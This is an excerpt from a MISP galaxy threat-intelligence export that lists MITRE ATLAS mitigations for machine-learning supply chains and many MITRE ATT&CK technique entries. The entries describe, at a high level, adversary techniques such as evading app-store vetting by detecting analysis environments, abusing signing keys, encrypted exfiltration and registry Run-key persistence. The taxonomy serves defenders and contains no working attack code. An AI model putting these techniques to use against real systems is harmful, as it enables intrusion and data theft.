Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. Adversaries can embed malicious code in ML software or models. Enforcement of code signing can prevent the compromise of the machine learning supply chain and prevent execution of malicious code.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Code Signing"

Code Signing has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Software" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5313. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0013

Verify ML Artifacts

Verify the cryptographic checksum of all machine learning artifacts to verify that the file was not modified by an attacker.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Verify ML Artifacts"

Verify ML Artifacts has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Publish Poisoned Datasets" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Supply Chain Compromise" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5314. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0014

Adversarial Input Detection

Detect and block adversarial inputs or atypical queries that deviate from known benign behavior, exhibit behavior patterns observed in previous attacks or that come from potentially malicious IPs. Incorporate adversarial detection algorithms into the ML system prior to the ML model.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Adversarial Input Detection"

Adversarial Input Detection has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Denial of ML Service" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5315. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0015

Vulnerability Scanning

Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.

File formats such as pickle files that are commonly used to store machine learning models can contain exploits that allow for arbitrary code execution.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Vulnerability Scanning"

Vulnerability Scanning has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5316. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0016

Model Distribution Methods

Deploying ML models to edge devices can increase the attack surface of the system. Consider serving models in the cloud to reduce the level of access the adversary has to the model.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Model Distribution Methods"

Model Distribution Methods has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="White-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Full ML Model Access" with estimative-language:likelihood-probability="almost-certain"

Table 5317. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0017

User Training

Educate ML model developers on secure coding practices and ML vulnerabilities.

The tag is: misp-galaxy:mitre-atlas-course-of-action="User Training"

User Training has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="User Execution" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5318. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0018

Attack Pattern

ATT&CK tactic.

Attack Pattern is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Test ability to evade automated mobile application security analysis performed by app stores - T1393

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1393).

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)

The tag is: misp-galaxy:mitre-attack-pattern="Test ability to evade automated mobile application security analysis performed by app stores - T1393"

Table 5319. Table References

Links

https://attack.mitre.org/techniques/T1393

Choose pre-compromised mobile app developer account credentials or signing keys - T1391

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1391).

The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer’s identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)

The tag is: misp-galaxy:mitre-attack-pattern="Choose pre-compromised mobile app developer account credentials or signing keys - T1391"

Table 5320. Table References

Links

https://attack.mitre.org/techniques/T1391

Enumerate externally facing software applications technologies, languages, and dependencies - T1261

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1261).

Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)

The tag is: misp-galaxy:mitre-attack-pattern="Enumerate externally facing software applications technologies, languages, and dependencies - T1261"

Table 5321. Table References

Links

https://attack.mitre.org/techniques/T1261

Obtain Apple iOS enterprise distribution key pair and certificate - T1392

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1392).

The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Apple iOS enterprise distribution key pair and certificate - T1392"

Table 5322. Table References

Links

https://attack.mitre.org/techniques/T1392

Analyze social and business relationships, interests, and affiliations - T1295

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1295).

Social media provides insight into the target’s affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze social and business relationships, interests, and affiliations - T1295"

Table 5323. Table References

Links

https://attack.mitre.org/techniques/T1295

Linux and Mac File and Directory Permissions Modification - T1222.002

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: <code>chown</code> (short for change owner), and <code>chmod</code> (short for change mode).

Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002"

Table 5324. Table References

Links

https://attack.mitre.org/techniques/T1222/002

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110

https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100

Install and configure hardware, network, and systems - T1336

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1336).

An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)

The tag is: misp-galaxy:mitre-attack-pattern="Install and configure hardware, network, and systems - T1336"

Table 5325. Table References

Links

https://attack.mitre.org/techniques/T1336

Compromise 3rd party or closed-source vulnerability/exploit information - T1354

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1354).

There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party or closed-source vulnerability/exploit information - T1354"

Table 5326. Table References

Links

https://attack.mitre.org/techniques/T1354

https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage

Discover new exploits and monitor exploit-provider forums - T1350

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1350).

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)

The tag is: misp-galaxy:mitre-attack-pattern="Discover new exploits and monitor exploit-provider forums - T1350"

Table 5327. Table References

Links

https://attack.mitre.org/techniques/T1350

https://www.threatminer.org/_reports/2015/Equation_group_questions_and_answers.pdf

Acquire and/or use 3rd party software services - T1330

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1330).

A wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330"

Acquire and/or use 3rd party software services - T1330 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1308" with estimative-language:likelihood-probability="almost-certain"

Table 5328. Table References

Links

https://attack.mitre.org/techniques/T1330

Acquire and/or use 3rd party infrastructure services - T1307

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307"

Acquire and/or use 3rd party infrastructure services - T1307 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329" with estimative-language:likelihood-probability="almost-certain"

Table 5329. Table References

Links

https://attack.mitre.org/techniques/T1307

Acquire and/or use 3rd party software services - T1308

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1308).

A wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1308"

Acquire and/or use 3rd party software services - T1308 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330" with estimative-language:likelihood-probability="almost-certain"

Table 5330. Table References

Links

https://attack.mitre.org/techniques/T1308

Test signature detection for file upload/email filters - T1361

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1361).

An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)

The tag is: misp-galaxy:mitre-attack-pattern="Test signature detection for file upload/email filters - T1361"

Table 5331. Table References

Links

https://attack.mitre.org/techniques/T1361

Acquire and/or use 3rd party infrastructure services - T1329

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1329).

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329"

Acquire and/or use 3rd party infrastructure services - T1329 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307" with estimative-language:likelihood-probability="almost-certain"

Table 5332. Table References

Links

https://attack.mitre.org/techniques/T1329

https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

Acquire or compromise 3rd party signing certificates - T1310

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1310).

Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1310"

Acquire or compromise 3rd party signing certificates - T1310 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1332" with estimative-language:likelihood-probability="almost-certain"

Table 5333. Table References

Links

https://attack.mitre.org/techniques/T1310

Compromise 3rd party infrastructure to support delivery - T1312

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1312).

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312"

Compromise 3rd party infrastructure to support delivery - T1312 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334" with estimative-language:likelihood-probability="almost-certain"

Table 5334. Table References

Links

https://attack.mitre.org/techniques/T1312

Acquire or compromise 3rd party signing certificates - T1332

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1332).

Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is. (Citation: DiginotarCompromise)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1332"

Acquire or compromise 3rd party signing certificates - T1332 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1310" with estimative-language:likelihood-probability="almost-certain"

Table 5335. Table References

Links

https://attack.mitre.org/techniques/T1332

https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

Compromise 3rd party infrastructure to support delivery - T1334

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1334).

Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334"

Compromise 3rd party infrastructure to support delivery - T1334 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312" with estimative-language:likelihood-probability="almost-certain"

Table 5336. Table References

Links

https://attack.mitre.org/techniques/T1334

Human performs requested action of physical nature - T1385

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)

The tag is: misp-galaxy:mitre-attack-pattern="Human performs requested action of physical nature - T1385"

Table 5337. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1385

Abuse of iOS Enterprise App Signing Key - T1445

An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple’s App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).

Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple’s App Store.

Platforms: iOS

The tag is: misp-galaxy:mitre-attack-pattern="Abuse of iOS Enterprise App Signing Key - T1445"

Abuse of iOS Enterprise App Signing Key - T1445 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 5338. Table References

Links

https://attack.mitre.org/techniques/T1445

Deliver Malicious App via Authorized App Store - T1475

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.

App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:

Adversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)

Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)

Adversaries may also use control of a target’s Google account to use the Google Play Store’s remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)

The tag is: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475"

Table 5339. Table References

Links

http://dl.acm.org/citation.cfm?id=2592796

http://www.vvdveen.com/publications/BAndroid.pdf

https://attack.mitre.org/techniques/T1475

https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/

https://jon.oberheide.org/files/summercon12-bouncer.pdf

https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdf

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html

https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei

Device Unlock Code Guessing or Brute Force - T1459

An adversary could make educated guesses of the device lock screen’s PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Device Unlock Code Guessing or Brute Force - T1459"

Device Unlock Code Guessing or Brute Force - T1459 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

Table 5340. Table References

Links

https://attack.mitre.org/techniques/T1459

Assign KITs, KIQs, and/or intelligence requirements - T1238

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1238).

Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Assign KITs, KIQs, and/or intelligence requirements - T1238"

Table 5341. Table References

Links

https://attack.mitre.org/techniques/T1238

Assess current holdings, needs, and wants - T1236

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1236).

Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)

The tag is: misp-galaxy:mitre-attack-pattern="Assess current holdings, needs, and wants - T1236"

Table 5342. Table References

Links

https://attack.mitre.org/techniques/T1236

Submit KITs, KIQs, and intelligence requirements - T1237

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1237).

Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)

The tag is: misp-galaxy:mitre-attack-pattern="Submit KITs, KIQs, and intelligence requirements - T1237"

Table 5343. Table References

Links

https://attack.mitre.org/techniques/T1237

Common, high volume protocols and software - T1321

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1321).

Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary’s traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)

The tag is: misp-galaxy:mitre-attack-pattern="Common, high volume protocols and software - T1321"

Table 5344. Table References

Links

https://attack.mitre.org/techniques/T1321

Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP).

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001"

Table 5345. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1048/001

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002"

Table 5346. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1048/002

Non-traditional or less attributable payment options - T1316

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1316).

Using alternative payment options allows an adversary to hide their activities. Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)

The tag is: misp-galaxy:mitre-attack-pattern="Non-traditional or less attributable payment options - T1316"

Table 5347. Table References

Links

https://attack.mitre.org/techniques/T1316

Choose pre-compromised persona and affiliated accounts - T1343

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1343).

For attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)

The tag is: misp-galaxy:mitre-attack-pattern="Choose pre-compromised persona and affiliated accounts - T1343"

Table 5348. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1343

Malicious or Vulnerable Built-in Device Functionality - T1473

The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious or Vulnerable Built-in Device Functionality - T1473"

Malicious or Vulnerable Built-in Device Functionality - T1473 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 5349. Table References

Links

https://attack.mitre.org/techniques/T1473

Identify vulnerabilities in third-party software libraries - T1389

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1389).

Many applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify vulnerabilities in third-party software libraries - T1389"

Table 5350. Table References

Links

https://attack.mitre.org/techniques/T1389

Registry Run Keys / Startup Folder - T1547.001

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.

The following run keys are created by default on Windows systems:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>

